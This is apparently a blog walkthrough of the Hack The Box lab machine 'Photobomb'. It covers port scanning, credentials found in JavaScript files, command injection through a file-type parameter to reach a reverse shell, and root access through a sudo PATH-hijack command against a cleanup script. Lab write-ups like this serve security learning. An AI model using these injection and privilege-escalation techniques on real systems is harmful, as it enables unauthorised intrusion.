C R E A T E & D E S T R OY

Photobomb | Hack The Box

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Our initial results, we get domain (photobomb.htb) and an open SSH port.

The web server gives us this – it displays whatever URI you enter, it may be vulnerable – we’ll test while we enumerate directories and vhosts.

While browsing with burp we see a few .js files we can enumerate and inside find some creds, which we can use to log into http://photobomb.htb/printer/

Messing around with the parameters throws us an error page

The part of the file we can see suggests it’s checking that photo name matches and then just combining the photo name + filetype into a request. Maybe we can insert our own request?

We can see confirmation that it’s requested photo+filetype;our text here. Let’s see if we can get code execution; we can. Testing if we we can smuggle a request in the parameters, using filetype to insert a new command at the end of the string and can access ourselves using wget. Using a Python3 one liner we can pop a shell as user wizard.

We quickly make up some SSH keys and get back into the box to enumerate things.

cat cleanup.sh 
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

The script ran as sudo is using a relative version of find, so we can just create a payload in ~/photobomb/ called find and change our environment variable.

wizard@photobomb:~/photobomb$ sudo PATH=$(pwd):$PATH /opt/cleanup.sh

Just like that we pop a shell as root and the box is done.

Leave a Reply

Your email address will not be published. Required fields are marked *